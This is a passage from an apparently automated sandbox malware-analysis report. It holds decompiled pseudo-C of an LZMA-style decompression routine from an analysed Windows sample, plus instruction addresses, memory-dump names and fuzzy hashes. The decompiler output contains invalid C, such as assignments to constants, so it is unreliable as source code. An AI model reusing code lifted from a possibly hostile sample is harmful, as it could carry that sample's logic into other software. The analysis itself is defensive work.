                  								__edx = 0;
                  								_t420 = __eax % _v120;
                  								__eax = __eax / _v120;
                  								__edx = _t420;
                  								__eax = _v108;
                  								_v108 = _v108 + 1;
                  								_v104 = _v104 - 1;
                  								_v52 = _v52 - 1;
                  								__eflags = _v52;
                  								 *_v108 = __cl;
                  								_v24 = _t420;
                  								if(_v52 > 0) {
                  									continue;
                  								} else {
                  									L83:
                  									_v140 = 2;
                  									goto L3;
                  								}
                  							}
                  							_v140 = 0x1c;
                  							L173:
                  							_push(0x22);
                  							_pop(_t574);
                  							memcpy(_v148,  &_v140, _t574 << 2);
                  							return 0;
                  					}
                  				}
                  				L174:
                  				_t538 = _t537 | 0xffffffff;
                  				return _t538;
                  			}










































                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x004068d2
                  0x004068d8
                  0x004068da
                  0x004068e1
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                  • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                  • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                  • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E004062EB() {
                  				signed int _t539;
                  				unsigned short _t540;
                  				signed int _t541;
                  				void _t542;
                  				signed int _t543;
                  				signed int _t544;
                  				signed int _t573;
                  				signed int _t576;
                  				signed int _t597;
                  				signed int* _t614;
                  				void* _t621;
                  
                  				L0:
                  				while(1) {
                  					L0:
                  					if( *(_t621 - 0x40) != 1) {
                  						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                  						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                  						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                  						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                  						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                  						_t539 =  *(_t621 - 4) + 0x664;
                  						 *(_t621 - 0x58) = _t539;
                  						goto L68;
                  					} else {
                  						 *(__ebp - 0x84) = 8;
                  						while(1) {
                  							L132:
                  							 *(_t621 - 0x54) = _t614;
                  							while(1) {
                  								L133:
                  								_t540 =  *_t614;
                  								_t597 = _t540 & 0x0000ffff;
                  								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                  								if( *(_t621 - 0xc) >= _t573) {
                  									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                  									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                  									 *(_t621 - 0x40) = 1;
                  									_t541 = _t540 - (_t540 >> 5);
                  									 *_t614 = _t541;
                  								} else {
                  									 *(_t621 - 0x10) = _t573;
                  									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                  									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                  								}
                  								if( *(_t621 - 0x10) >= 0x1000000) {
                  									goto L139;
                  								}
                  								L137:
                  								if( *(_t621 - 0x6c) == 0) {
                  									 *(_t621 - 0x88) = 5;
                  									L170:
                  									_t576 = 0x22;
                  									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                  									_t544 = 0;
                  									L172:
                  									return _t544;
                  								}
                  								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                  								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                  								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                  								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                  								L139:
                  								_t542 =  *(_t621 - 0x84);
                  								while(1) {
                  									 *(_t621 - 0x88) = _t542;
                  									while(1) {
                  										L1:
                  										_t543 =  *(_t621 - 0x88);
                  										if(_t543 > 0x1c) {
                  											break;
                  										}
                  										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
                  											case 0:
                  												if( *(_t621 - 0x6c) == 0) {
                  													goto L170;
                  												}
                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                  												_t543 =  *( *(_t621 - 0x70));
                  												if(_t543 > 0xe1) {
                  													goto L171;
                  												}
                  												_t547 = _t543 & 0x000000ff;
                  												_push(0x2d);
                  												asm("cdq");
                  												_pop(_t578);
                  												_push(9);
                  												_pop(_t579);
                  												_t617 = _t547 / _t578;
                  												_t549 = _t547 % _t578 & 0x000000ff;
                  												asm("cdq");
                  												_t612 = _t549 % _t579 & 0x000000ff;
                  												 *(_t621 - 0x3c) = _t612;
                  												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                  												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                  												_t620 = (0x300 << _t612 + _t617) + 0x736;
                  												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                  													L10:
                  													if(_t620 == 0) {
                  														L12:
                  														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                  														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                  														goto L15;
                  													} else {
                  														goto L11;
                  													}
                  													do {
                  														L11:
                  														_t620 = _t620 - 1;
                  														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                  													} while (_t620 != 0);
                  													goto L12;
                  												}
                  												if( *(_t621 - 4) != 0) {
                  													GlobalFree( *(_t621 - 4));
                  												}
                  												_t543 = GlobalAlloc(0x40, 0x600); // executed
                  												 *(_t621 - 4) = _t543;
                  												if(_t543 == 0) {
                  													goto L171;
                  												} else {
                  													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                  													goto L10;
                  												}
                  											case 1:
                  												L13:
                  												__eflags =  *(_t621 - 0x6c);
                  												if( *(_t621 - 0x6c) == 0) {
                  													 *(_t621 - 0x88) = 1;
                  													goto L170;
                  												}
                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                  												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                  												_t45 = _t621 - 0x48;
                  												 *_t45 =  *(_t621 - 0x48) + 1;
                  												__eflags =  *_t45;
                  												L15:
                  												if( *(_t621 - 0x48) < 4) {
                  													goto L13;
                  												}
                  												_t555 =  *(_t621 - 0x40);
                  												if(_t555 ==  *(_t621 - 0x74)) {
                  													L20:
                  													 *(_t621 - 0x48) = 5;
                  													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                  													goto L23;
                  												}
                  												 *(_t621 - 0x74) = _t555;
                  												if( *(_t621 - 8) != 0) {
                  													GlobalFree( *(_t621 - 8));
                  												}
                  												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                  												 *(_t621 - 8) = _t543;
                  												if(_t543 == 0) {
                  													goto L171;
                  												} else {
                  													goto L20;
                  												}
                  											case 2:
                  												L24:
                  												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                  												 *(_t621 - 0x84) = 6;
                  												 *(_t621 - 0x4c) = _t562;
                  												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                  												goto L132;
                  											case 3:
                  												L21:
                  												__eflags =  *(_t621 - 0x6c);
                  												if( *(_t621 - 0x6c) == 0) {
                  													 *(_t621 - 0x88) = 3;
                  													goto L170;
                  												}
                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                  												_t67 = _t621 - 0x70;
                  												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                  												__eflags =  *_t67;
                  												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                  												L23:
                  												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                  												if( *(_t621 - 0x48) != 0) {
                  													goto L21;
                  												}
                  												goto L24;
                  											case 4:
                  												L133:
                  												_t540 =  *_t614;
                  												_t597 = _t540 & 0x0000ffff;
                  												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                  												if( *(_t621 - 0xc) >= _t573) {
                  													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                  													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                  													 *(_t621 - 0x40) = 1;
                  													_t541 = _t540 - (_t540 >> 5);
                  													 *_t614 = _t541;
                  												} else {
                  													 *(_t621 - 0x10) = _t573;
                  													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                  													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                  												}
                  												if( *(_t621 - 0x10) >= 0x1000000) {
                  													goto L139;
                  												}
                  											case 5:
                  												goto L137;
                  											case 6:
                  												__edx = 0;
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													__eax =  *(__ebp - 4);
                  													__ecx =  *(__ebp - 0x38);
                  													 *(__ebp - 0x34) = 1;
                  													 *(__ebp - 0x84) = 7;
                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                  													L132:
                  													 *(_t621 - 0x54) = _t614;
                  													goto L133;
                  												}
                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                  												__esi =  *(__ebp - 0x60);
                  												__cl = 8;
                  												__cl = 8 -  *(__ebp - 0x3c);
                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                  												__ecx =  *(__ebp - 0x3c);
                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                  												__ecx =  *(__ebp - 4);
                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                  												__eflags =  *(__ebp - 0x38) - 4;
                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  												if( *(__ebp - 0x38) >= 4) {
                  													__eflags =  *(__ebp - 0x38) - 0xa;
                  													if( *(__ebp - 0x38) >= 0xa) {
                  														_t98 = __ebp - 0x38;
                  														 *_t98 =  *(__ebp - 0x38) - 6;
                  														__eflags =  *_t98;
                  													} else {
                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                  													}
                  												} else {
                  													 *(__ebp - 0x38) = 0;
                  												}
                  												__eflags =  *(__ebp - 0x34) - __edx;
                  												if( *(__ebp - 0x34) == __edx) {
                  													__ebx = 0;
                  													__ebx = 1;
                  													goto L61;
                  												} else {
                  													__eax =  *(__ebp - 0x14);
                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  													__eflags = __eax -  *(__ebp - 0x74);
                  													if(__eax >=  *(__ebp - 0x74)) {
                  														__eax = __eax +  *(__ebp - 0x74);
                  														__eflags = __eax;
                  													}
                  													__ecx =  *(__ebp - 8);
                  													__ebx = 0;
                  													__ebx = 1;
                  													__al =  *((intOrPtr*)(__eax + __ecx));
                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                  													goto L41;
                  												}
                  											case 7:
                  												goto L0;
                  											case 8:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													__eax =  *(__ebp - 4);
                  													__ecx =  *(__ebp - 0x38);
                  													 *(__ebp - 0x84) = 0xa;
                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                  												} else {
                  													__eax =  *(__ebp - 0x38);
                  													__ecx =  *(__ebp - 4);
                  													__eax =  *(__ebp - 0x38) + 0xf;
                  													 *(__ebp - 0x84) = 9;
                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                  												}
                  												while(1) {
                  													L132:
                  													 *(_t621 - 0x54) = _t614;
                  													goto L133;
                  												}
                  											case 9:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													goto L89;
                  												}
                  												__eflags =  *(__ebp - 0x60);
                  												if( *(__ebp - 0x60) == 0) {
                  													goto L171;
                  												}
                  												__eax = 0;
                  												__eflags =  *(__ebp - 0x38) - 7;
                  												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                  												__eflags = _t258;
                  												0 | _t258 = _t258 + _t258 + 9;
                  												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                  												goto L75;
                  											case 0xa:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													__eax =  *(__ebp - 4);
                  													__ecx =  *(__ebp - 0x38);
                  													 *(__ebp - 0x84) = 0xb;
                  													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                  													while(1) {
                  														L132:
                  														 *(_t621 - 0x54) = _t614;
                  														goto L133;
                  													}
                  												}
                  												__eax =  *(__ebp - 0x28);
                  												goto L88;
                  											case 0xb:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													__ecx =  *(__ebp - 0x24);
                  													__eax =  *(__ebp - 0x20);
                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  												} else {
                  													__eax =  *(__ebp - 0x24);
                  												}
                  												__ecx =  *(__ebp - 0x28);
                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  												L88:
                  												__ecx =  *(__ebp - 0x2c);
                  												 *(__ebp - 0x2c) = __eax;
                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  												L89:
                  												__eax =  *(__ebp - 4);
                  												 *(__ebp - 0x80) = 0x15;
                  												__eax =  *(__ebp - 4) + 0xa68;
                  												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                  												goto L68;
                  											case 0xc:
                  												L99:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0xc;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t334 = __ebp - 0x70;
                  												 *_t334 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t334;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												__eax =  *(__ebp - 0x2c);
                  												goto L101;
                  											case 0xd:
                  												L37:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0xd;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t122 = __ebp - 0x70;
                  												 *_t122 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t122;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												L39:
                  												__eax =  *(__ebp - 0x40);
                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                  													goto L48;
                  												}
                  												__eflags = __ebx - 0x100;
                  												if(__ebx >= 0x100) {
                  													goto L54;
                  												}
                  												L41:
                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                  												__ecx =  *(__ebp - 0x58);
                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                  												 *(__ebp - 0x48) = __eax;
                  												__eax = __eax + 1;
                  												__eax = __eax << 8;
                  												__eax = __eax + __ebx;
                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  												__ax =  *__esi;
                  												 *(__ebp - 0x54) = __esi;
                  												__edx = __ax & 0x0000ffff;
                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                  												__eflags =  *(__ebp - 0xc) - __ecx;
                  												if( *(__ebp - 0xc) >= __ecx) {
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  													__cx = __ax;
                  													 *(__ebp - 0x40) = 1;
                  													__cx = __ax >> 5;
                  													__eflags = __eax;
                  													__ebx = __ebx + __ebx + 1;
                  													 *__esi = __ax;
                  												} else {
                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                  													 *(__ebp - 0x10) = __ecx;
                  													0x800 = 0x800 - __edx;
                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                  													__ebx = __ebx + __ebx;
                  													 *__esi = __cx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												 *(__ebp - 0x44) = __ebx;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													goto L39;
                  												} else {
                  													goto L37;
                  												}
                  											case 0xe:
                  												L46:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0xe;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t156 = __ebp - 0x70;
                  												 *_t156 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t156;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												while(1) {
                  													L48:
                  													__eflags = __ebx - 0x100;
                  													if(__ebx >= 0x100) {
                  														break;
                  													}
                  													__eax =  *(__ebp - 0x58);
                  													__edx = __ebx + __ebx;
                  													__ecx =  *(__ebp - 0x10);
                  													__esi = __edx + __eax;
                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                  													__ax =  *__esi;
                  													 *(__ebp - 0x54) = __esi;
                  													__edi = __ax & 0x0000ffff;
                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  													__eflags =  *(__ebp - 0xc) - __ecx;
                  													if( *(__ebp - 0xc) >= __ecx) {
                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  														__cx = __ax;
                  														_t170 = __edx + 1; // 0x1
                  														__ebx = _t170;
                  														__cx = __ax >> 5;
                  														__eflags = __eax;
                  														 *__esi = __ax;
                  													} else {
                  														 *(__ebp - 0x10) = __ecx;
                  														0x800 = 0x800 - __edi;
                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  														__ebx = __ebx + __ebx;
                  														 *__esi = __cx;
                  													}
                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                  													 *(__ebp - 0x44) = __ebx;
                  													if( *(__ebp - 0x10) >= 0x1000000) {
                  														continue;
                  													} else {
                  														goto L46;
                  													}
                  												}
                  												L54:
                  												_t173 = __ebp - 0x34;
                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                  												__eflags =  *_t173;
                  												goto L55;
                  											case 0xf:
                  												L58:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0xf;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t203 = __ebp - 0x70;
                  												 *_t203 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t203;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												L60:
                  												__eflags = __ebx - 0x100;
                  												if(__ebx >= 0x100) {
                  													L55:
                  													__al =  *(__ebp - 0x44);
                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                  													goto L56;
                  												}
                  												L61:
                  												__eax =  *(__ebp - 0x58);
                  												__edx = __ebx + __ebx;
                  												__ecx =  *(__ebp - 0x10);
                  												__esi = __edx + __eax;
                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                  												__ax =  *__esi;
                  												 *(__ebp - 0x54) = __esi;
                  												__edi = __ax & 0x0000ffff;
                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  												__eflags =  *(__ebp - 0xc) - __ecx;
                  												if( *(__ebp - 0xc) >= __ecx) {
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  													__cx = __ax;
                  													_t217 = __edx + 1; // 0x1
                  													__ebx = _t217;
                  													__cx = __ax >> 5;
                  													__eflags = __eax;
                  													 *__esi = __ax;
                  												} else {
                  													 *(__ebp - 0x10) = __ecx;
                  													0x800 = 0x800 - __edi;
                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  													__ebx = __ebx + __ebx;
                  													 *__esi = __cx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												 *(__ebp - 0x44) = __ebx;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													goto L60;
                  												} else {
                  													goto L58;
                  												}
                  											case 0x10:
                  												L109:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0x10;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t365 = __ebp - 0x70;
                  												 *_t365 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t365;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												goto L111;
                  											case 0x11:
                  												L68:
                  												_t614 =  *(_t621 - 0x58);
                  												 *(_t621 - 0x84) = 0x12;
                  												while(1) {
                  													L132:
                  													 *(_t621 - 0x54) = _t614;
                  													goto L133;
                  												}
                  											case 0x12:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													__eax =  *(__ebp - 0x58);
                  													 *(__ebp - 0x84) = 0x13;
                  													__esi =  *(__ebp - 0x58) + 2;
                  													while(1) {
                  														L132:
                  														 *(_t621 - 0x54) = _t614;
                  														goto L133;
                  													}
                  												}
                  												__eax =  *(__ebp - 0x4c);
                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                  												__ecx =  *(__ebp - 0x58);
                  												__eax =  *(__ebp - 0x4c) << 4;
                  												__eflags = __eax;
                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                  												goto L130;
                  											case 0x13:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													_t469 = __ebp - 0x58;
                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                  													__eflags =  *_t469;
                  													 *(__ebp - 0x30) = 0x10;
                  													 *(__ebp - 0x40) = 8;
                  													L144:
                  													 *(__ebp - 0x7c) = 0x14;
                  													goto L145;
                  												}
                  												__eax =  *(__ebp - 0x4c);
                  												__ecx =  *(__ebp - 0x58);
                  												__eax =  *(__ebp - 0x4c) << 4;
                  												 *(__ebp - 0x30) = 8;
                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                  												L130:
                  												 *(__ebp - 0x58) = __eax;
                  												 *(__ebp - 0x40) = 3;
                  												goto L144;
                  											case 0x14:
                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                  												__eax =  *(__ebp - 0x80);
                  												 *(_t621 - 0x88) = _t542;
                  												goto L1;
                  											case 0x15:
                  												__eax = 0;
                  												__eflags =  *(__ebp - 0x38) - 7;
